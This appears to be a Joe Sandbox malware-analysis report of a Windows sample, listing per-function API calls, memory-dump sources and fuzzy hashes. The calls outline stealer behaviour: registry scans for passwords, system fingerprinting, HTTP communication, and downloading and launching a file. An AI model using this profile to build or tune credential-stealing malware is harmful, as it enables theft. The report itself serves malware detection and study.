                      • lstrcat.KERNEL32(?,00420D80), ref: 04110ED6
                      • lstrcat.KERNEL32(?,00000000), ref: 04110EEF
                      • lstrcat.KERNEL32(?,00420D84), ref: 04110F01
                      • lstrlen.KERNEL32(?), ref: 04110F0E
                      • memset.MSVCRT ref: 04110F34
                      • memset.MSVCRT ref: 04110F48
                        • Part of subcall function 0411AA87: lstrlen.KERNEL32(0410516C,?,?,0410516C,00420DDE), ref: 0411AA92
                        • Part of subcall function 0411AA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 0411AAEC
                        • Part of subcall function 04118DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,04101660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FB4,00420E17), ref: 04118DED
                        • Part of subcall function 0411AB87: lstrcpy.KERNEL32(00000000,?), ref: 0411ABD9
                        • Part of subcall function 0411AB87: lstrcat.KERNEL32(00000000), ref: 0411ABE9
                        • Part of subcall function 0411AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 0411AC2C
                        • Part of subcall function 0411AC17: lstrcpy.KERNEL32(00000000), ref: 0411AC6B
                        • Part of subcall function 0411AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0411AC79
                        • Part of subcall function 0411AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0411AB6C
                        • Part of subcall function 0411AA07: lstrcpy.KERNEL32(?,00000000), ref: 0411AA4D
                        • Part of subcall function 04119927: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,04110DEC,?,00000000,?,00000000,004205C6,004205C5), ref: 04119948
                      • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 04110FC1
                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 04110FCD
                      Memory Dump Source
                      • Source File: 00000000.00000002.1892669834.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4100000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
                      • String ID:
                      • API String ID: 1395395982-0
                      • Opcode ID: 611dee48b04e9e0e2afdbc6d63dcd8839025fdd060787a2fa850c35645432629
                      • Instruction ID: 879ce204878832108661c210820bb1c89784321a42d0a3e9ec2d40ef4e4105f0
                      • Opcode Fuzzy Hash: 611dee48b04e9e0e2afdbc6d63dcd8839025fdd060787a2fa850c35645432629
                      • Instruction Fuzzy Hash: F481B7B5541218ABDB14EBA0DDD1FED7B39AF44348F0041B9A30A660A1EF747B88CF59
                      APIs
                        • Part of subcall function 0411A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0411A9EF
                      • memset.MSVCRT ref: 04110E83
                      • lstrcat.KERNEL32(?,00000000), ref: 04110E9C
                      • lstrcat.KERNEL32(?,00420D7C), ref: 04110EAE
                      • lstrcat.KERNEL32(?,00000000), ref: 04110EC4
                      • lstrcat.KERNEL32(?,00420D80), ref: 04110ED6
                      • lstrcat.KERNEL32(?,00000000), ref: 04110EEF
                      • lstrcat.KERNEL32(?,00420D84), ref: 04110F01
                      • lstrlen.KERNEL32(?), ref: 04110F0E
                      • memset.MSVCRT ref: 04110F34
                      • memset.MSVCRT ref: 04110F48
                        • Part of subcall function 0411AA87: lstrlen.KERNEL32(0410516C,?,?,0410516C,00420DDE), ref: 0411AA92
                        • Part of subcall function 0411AA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 0411AAEC
                        • Part of subcall function 04118DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,04101660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FB4,00420E17), ref: 04118DED
                        • Part of subcall function 0411AB87: lstrcpy.KERNEL32(00000000,?), ref: 0411ABD9
                        • Part of subcall function 0411AB87: lstrcat.KERNEL32(00000000), ref: 0411ABE9
                        • Part of subcall function 0411AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 0411AC2C
                        • Part of subcall function 0411AC17: lstrcpy.KERNEL32(00000000), ref: 0411AC6B
                        • Part of subcall function 0411AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0411AC79
                        • Part of subcall function 0411AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0411AB6C
                        • Part of subcall function 0411AA07: lstrcpy.KERNEL32(?,00000000), ref: 0411AA4D
                        • Part of subcall function 04119927: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,04110DEC,?,00000000,?,00000000,004205C6,004205C5), ref: 04119948
                      • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 04110FC1
                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 04110FCD
                      Memory Dump Source
                      • Source File: 00000000.00000002.1892669834.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4100000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
                      • String ID:
                      • API String ID: 1395395982-0
                      • Opcode ID: 5f02957f32bc588cc3f78102301ac57cffd73d36a7e7861b7e9dc44853b35b92
                      • Instruction ID: 5fa2fde6e02855c030b1011e789cc3ecee3eadd8d912116d835aa219380ad8ef
                      • Opcode Fuzzy Hash: 5f02957f32bc588cc3f78102301ac57cffd73d36a7e7861b7e9dc44853b35b92
                      • Instruction Fuzzy Hash: 1961E5B5541218ABDB14EBA0DDC5FED7B38AF44308F0041A9E70A660A1EF743B88CF59
                      APIs
                        • Part of subcall function 0411AA07: lstrcpy.KERNEL32(?,00000000), ref: 0411AA4D
                        • Part of subcall function 04104A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 04104A51
                        • Part of subcall function 04104A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 04104A68
                        • Part of subcall function 04104A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 04104A7F
                        • Part of subcall function 04104A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 04104AA0
                        • Part of subcall function 04104A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 04104AB0
                        • Part of subcall function 0411A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0411A9EF
                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 04104B7C
                      • StrCmpCA.SHLWAPI(?,0064A480), ref: 04104BA1
                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 04104D21
                      • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00420DDB,00000000,?,?,00000000,?,00421988,00000000,?,0064A514), ref: 0410504F
                      • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 0410506B
                      • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 0410507F
                      • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 041050B0
                      • InternetCloseHandle.WININET(00000000), ref: 04105114
                      • InternetCloseHandle.WININET(00000000), ref: 0410512C
                      • HttpOpenRequestA.WININET(00000000,0064A49C,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 04104D7C
                        • Part of subcall function 0411AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 0411AC2C
                        • Part of subcall function 0411AC17: lstrcpy.KERNEL32(00000000), ref: 0411AC6B
                        • Part of subcall function 0411AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0411AC79
                        • Part of subcall function 0411AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0411AB6C
                        • Part of subcall function 0411AB87: lstrcpy.KERNEL32(00000000,?), ref: 0411ABD9
                        • Part of subcall function 0411AB87: lstrcat.KERNEL32(00000000), ref: 0411ABE9
                      • InternetCloseHandle.WININET(00000000), ref: 04105136
                      Memory Dump Source
                      • Source File: 00000000.00000002.1892669834.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4100000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Internet$lstrcpy$lstrlen$??2@CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                      • String ID:
                      • API String ID: 2402878923-0
                      • Opcode ID: e9436af98fd97f90fb33399614dfc20492c57c9e4b406ec8cb954eac7af19915
                      • Instruction ID: e903f3fa54b1fd57de25aa5864d48894ac4ac7bb2b000e41d3afd12443c7c691
                      • Opcode Fuzzy Hash: e9436af98fd97f90fb33399614dfc20492c57c9e4b406ec8cb954eac7af19915
                      • Instruction Fuzzy Hash: E3122F72911218ABEB14EB90DDD1FEEBB79AF54344F5041A9A10A720A0EF703F88CF55
                      APIs
                        • Part of subcall function 0411AA07: lstrcpy.KERNEL32(?,00000000), ref: 0411AA4D
                        • Part of subcall function 04104A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 04104A51
                        • Part of subcall function 04104A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 04104A68
                        • Part of subcall function 04104A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 04104A7F
                        • Part of subcall function 04104A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 04104AA0
                        • Part of subcall function 04104A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 04104AB0
                        • Part of subcall function 0411A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0411A9EF
                      • InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 04106548
                      • StrCmpCA.SHLWAPI(?,0064A480), ref: 0410656A
                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0410659C
                      • HttpOpenRequestA.WININET(00000000,00421A28,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 041065EC
                      • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 04106626
                      • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 04106638
                      • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 04106664
                      • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 041066D4
                      • InternetCloseHandle.WININET(00000000), ref: 04106756
                      • InternetCloseHandle.WININET(00000000), ref: 04106760
                      • InternetCloseHandle.WININET(00000000), ref: 0410676A
                      Memory Dump Source
                      • Source File: 00000000.00000002.1892669834.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4100000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Internet$??2@CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                      • String ID:
                      • API String ID: 3074848878-0
                      • Opcode ID: 6233cd159639085ce3b028a95152e179a77ccdecf231ea1e95f5afa63e354fd7
                      • Instruction ID: 97b99aa379fe61071602d395275b419947a159265e5009000c2588ed32d36027
                      • Opcode Fuzzy Hash: 6233cd159639085ce3b028a95152e179a77ccdecf231ea1e95f5afa63e354fd7
                      • Instruction Fuzzy Hash: F1714E75A40218ABEB24DFA0DC89FEE7B75FF44740F1081A9E10A6B1D0DBB46A84CF51
                      APIs
                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 041192D3
                      Memory Dump Source
                      • Source File: 00000000.00000002.1892669834.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4100000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CreateGlobalStream
                      • String ID:
                      • API String ID: 2244384528-0
                      • Opcode ID: f19ccceb9d9d465938ce7f290bd949bbae8562b5bf3b96ffc27cc6e5329703af
                      • Instruction ID: c06a6d56ec2b579bcd50b4803d9fdafba708a01f828fb80854df19feee61b3b3
                      • Opcode Fuzzy Hash: f19ccceb9d9d465938ce7f290bd949bbae8562b5bf3b96ffc27cc6e5329703af
                      • Instruction Fuzzy Hash: 0D711CB9A50208ABDB14EFE4DD94FEEB7B9FF48304F108118F515A7290DB74A904CB61
                      APIs
                      • ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 004170DE
                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                      • OpenProcess.KERNEL32(001FFFFF,00000000,0041730D,004205BD), ref: 0041711C
                      • memset.MSVCRT ref: 0041716A
                      • ??_V@YAXPAX@Z.MSVCRT(?), ref: 004172BE
                      Strings
                      • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0041718C
                      • sA, xrefs: 00417111
                      • sA, xrefs: 004172AE, 00417179, 0041717C
                      Memory Dump Source
                      • Source File: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1891395960.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: OpenProcesslstrcpymemset
                      • String ID: sA$sA$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                      • API String ID: 224852652-2614523144
                      • Opcode ID: 83bc95c561d3c7d7ec3f072c7b35a55b7f907de0dec64aa1652b34b8f8455e89
                      • Instruction ID: ffe5c4151d56689e238fca5affca6521033e0b5082b25a646ea50ffb364ad3ac
                      • Opcode Fuzzy Hash: 83bc95c561d3c7d7ec3f072c7b35a55b7f907de0dec64aa1652b34b8f8455e89
                      • Instruction Fuzzy Hash: 71515FB0D04218ABDB14EB91DD85BEEB774AF04304F1040AEE61576281EB786AC9CF5D
                      APIs
                      • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 041177A9
                      • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 041177E6
                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 0411786A
                      • RtlAllocateHeap.NTDLL(00000000), ref: 04117871
                      • wsprintfA.USER32 ref: 041178A7
                        • Part of subcall function 0411A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0411A9EF
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1892669834.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4100000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                      • String ID: :$C$\$B
                      • API String ID: 1544550907-183544611
                      • Opcode ID: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                      • Instruction ID: 64a72e288513d9a34356eb956db9ce5c9d86ea0788adfa490ddaa5d61bf30af6
                      • Opcode Fuzzy Hash: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                      • Instruction Fuzzy Hash: 6541C3B1D40258EBDF10DFA4CC84BEEBBB9EF08704F1041A9E505A7290E7757A84CBA5
                      APIs
                        • Part of subcall function 004072D0: memset.MSVCRT ref: 00407314
                        • Part of subcall function 004072D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,00407C90), ref: 0040733A
                        • Part of subcall function 004072D0: RegEnumValueA.ADVAPI32(00407C90,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004073B1
                        • Part of subcall function 004072D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040740D
                        • Part of subcall function 004072D0: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407452
                        • Part of subcall function 004072D0: HeapFree.KERNEL32(00000000,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407459
                      • lstrcatA.KERNEL32(00000000,004217FC,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?,?,004161C4), ref: 00407606
                      • lstrcatA.KERNEL32(00000000,00000000,00000000), ref: 00407648
                      • lstrcatA.KERNEL32(00000000, : ), ref: 0040765A
                      • lstrcatA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040768F
                      • lstrcatA.KERNEL32(00000000,00421804), ref: 004076A0
                      • lstrcatA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004076D3
                      • lstrcatA.KERNEL32(00000000,00421808), ref: 004076ED
                      • task.LIBCPMTD ref: 004076FB
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1891395960.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                      • String ID: :
                      • API String ID: 3191641157-3653984579
                      • Opcode ID: 991097200e3f3986b00727b8e04d0ccc938683cf049b1a3c2dcf1bd456b0a09d
                      • Instruction ID: 32096a17696354d86885d8553091bec757242b1065822f319004c721f0fd16b2
                      • Opcode Fuzzy Hash: 991097200e3f3986b00727b8e04d0ccc938683cf049b1a3c2dcf1bd456b0a09d
                      • Instruction Fuzzy Hash: FE316B79E40109EFCB04FBE5DC85DEE737AFB49305B14542EE102B7290DA38A942CB66
                      APIs
                      • lstrcpy.KERNEL32(?,?), ref: 04111642
                        • Part of subcall function 04119047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 04119072
                        • Part of subcall function 041194C7: StrStrA.SHLWAPI(?,?), ref: 041194D3
                      • lstrcpy.KERNEL32(?,00000000), ref: 0411167E
                        • Part of subcall function 041194C7: lstrcpyn.KERNEL32(0064AB88,?,?), ref: 041194F7
                        • Part of subcall function 041194C7: lstrlen.KERNEL32(?), ref: 0411950E
                        • Part of subcall function 041194C7: wsprintfA.USER32 ref: 0411952E
                      • lstrcpy.KERNEL32(?,00000000), ref: 041116C6
                      • lstrcpy.KERNEL32(?,00000000), ref: 0411170E
                      • lstrcpy.KERNEL32(?,00000000), ref: 04111755
                      • lstrcpy.KERNEL32(?,00000000), ref: 0411179D
                      • lstrcpy.KERNEL32(?,00000000), ref: 041117E5
                      • lstrcpy.KERNEL32(?,00000000), ref: 0411182C
                      • lstrcpy.KERNEL32(?,00000000), ref: 04111874
                        • Part of subcall function 0411AA87: lstrlen.KERNEL32(0410516C,?,?,0410516C,00420DDE), ref: 0411AA92
                        • Part of subcall function 0411AA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 0411AAEC
                      • strtok_s.MSVCRT ref: 041119B7
                      Memory Dump Source
                      • Source File: 00000000.00000002.1892669834.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4100000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$lstrlen$FolderPathlstrcpynstrtok_swsprintf
                      • String ID:
                      • API String ID: 4276352425-0
                      • Opcode ID: 83c65cf866c105f8028d079524fd97563369a1785312c17678ae49576856bbd9
                      • Instruction ID: ec88e31b165953740ebcb0acb732c413bbba2cb8cef93401eff6f915786e7964
                      • Opcode Fuzzy Hash: 83c65cf866c105f8028d079524fd97563369a1785312c17678ae49576856bbd9
                      • Instruction Fuzzy Hash: A17195B2951118ABDB14EBA0DCD8EEE7779AF54304F0049A9E10DA3160EF75AB84CF61
                      APIs
                      • memset.MSVCRT ref: 00407314
                      • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,00407C90), ref: 0040733A
                      • RegEnumValueA.ADVAPI32(00407C90,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004073B1
                      • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040740D
                      • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407452
                      • HeapFree.KERNEL32(00000000,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407459
                        • Part of subcall function 00409240: vsprintf_s.MSVCRT ref: 0040925B
                      • task.LIBCPMTD ref: 00407555
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1891395960.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$EnumFreeOpenProcessValuememsettaskvsprintf_s
                      • String ID: Password
                      • API String ID: 2698061284-3434357891
                      • Opcode ID: 5be579466c40cef3c45c052574d28d43fb537906c51874de2e9a9a2bc2377bc3
                      • Instruction ID: ef12ebdd473109685825b75701b45193a1214ac884297e43e73859b9717fa869
                      • Opcode Fuzzy Hash: 5be579466c40cef3c45c052574d28d43fb537906c51874de2e9a9a2bc2377bc3
                      • Instruction Fuzzy Hash: B8614DB5D0416C9BDB24DB50CD41BDAB7B8BF44304F0081EAE689A6281DB746FC9CFA5
                      APIs
                      • lstrcatA.KERNEL32(?,0254CAB0,?,00000104,?,00000104,?,00000104,?,00000104), ref: 004147DB
                        • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                      • lstrcatA.KERNEL32(?,00000000), ref: 00414801
                      • lstrcatA.KERNEL32(?,?), ref: 00414820
                      • lstrcatA.KERNEL32(?,?), ref: 00414834
                      • lstrcatA.KERNEL32(?,02519800), ref: 00414847
                      • lstrcatA.KERNEL32(?,?), ref: 0041485B
                      • lstrcatA.KERNEL32(?,0254D6B0), ref: 0041486F
                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                        • Part of subcall function 00418D90: GetFileAttributesA.KERNEL32(00000000,?,00410117,?,00000000,?,00000000,00420DAB,00420DAA), ref: 00418D9F
                        • Part of subcall function 00414570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00414580
                        • Part of subcall function 00414570: HeapAlloc.KERNEL32(00000000), ref: 00414587
                        • Part of subcall function 00414570: wsprintfA.USER32 ref: 004145A6
                        • Part of subcall function 00414570: FindFirstFileA.KERNEL32(?,?), ref: 004145BD
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1891395960.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$FileHeap$AllocAttributesFindFirstFolderPathProcesslstrcpywsprintf
                      • String ID: 0aA
                      • API String ID: 167551676-2786531170
                      • Opcode ID: c41430eb4feb1aa100886eeb9410b758f6c3d0d9cc64a6702e2d15a1bac7c1b5
                      • Instruction ID: 67fb29d5a8d89bc8d31ec604eacddc75011aa0e27ff4711df2ee94280de74797
                      • Opcode Fuzzy Hash: c41430eb4feb1aa100886eeb9410b758f6c3d0d9cc64a6702e2d15a1bac7c1b5
                      • Instruction Fuzzy Hash: EF3182BAD402086BDB10FBF0DC85EE9737DAB48704F40458EB31996081EE7897C9CB99
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0254C930,00000000,?,00420E2C,00000000,?,00000000), ref: 00418130
                      • HeapAlloc.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,0254C930,00000000,?,00420E2C,00000000,?,00000000,00000000), ref: 00418137
                      • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00418158
                      • __aulldiv.LIBCMT ref: 00418172
                      • __aulldiv.LIBCMT ref: 00418180
                      • wsprintfA.USER32 ref: 004181AC
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1891395960.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap__aulldiv$AllocGlobalMemoryProcessStatuswsprintf
                      • String ID: %d MB$@
                      • API String ID: 2886426298-3474575989
                      • Opcode ID: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                      • Instruction ID: 96825d9750bf8db03c9b3ba7d6dfdbb869a7567600a83181e99cf30d3b71d0f4
                      • Opcode Fuzzy Hash: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                      • Instruction Fuzzy Hash: CD210BB1E44218BBDB00DFD5CC49FAEB7B9FB45B14F104609F605BB280D77869018BA9
                      APIs
                        • Part of subcall function 0411AA07: lstrcpy.KERNEL32(?,00000000), ref: 0411AA4D
                        • Part of subcall function 04104A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 04104A51
                        • Part of subcall function 04104A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 04104A68
                        • Part of subcall function 04104A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 04104A7F
                        • Part of subcall function 04104A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 04104AA0
                        • Part of subcall function 04104A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 04104AB0
                      • InternetOpenA.WININET(00420DF7,00000001,00000000,00000000,00000000), ref: 04106376
                      • StrCmpCA.SHLWAPI(?,0064A480), ref: 041063AE
                      • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 041063F6
                      • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 0410641A
                      • InternetReadFile.WININET(?,?,00000400,?), ref: 04106443
                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 04106471
                      • CloseHandle.KERNEL32(?,?,00000400), ref: 041064B0
                      • InternetCloseHandle.WININET(?), ref: 041064BA
                      • InternetCloseHandle.WININET(00000000), ref: 041064C7
                      Memory Dump Source
                      • Source File: 00000000.00000002.1892669834.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4100000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Internet$??2@CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                      • String ID:
                      • API String ID: 4287319946-0
                      • Opcode ID: b915265d1829dfbd27db1cb5210114f0d1e48a2f7e5b50ca4442b739670315f0
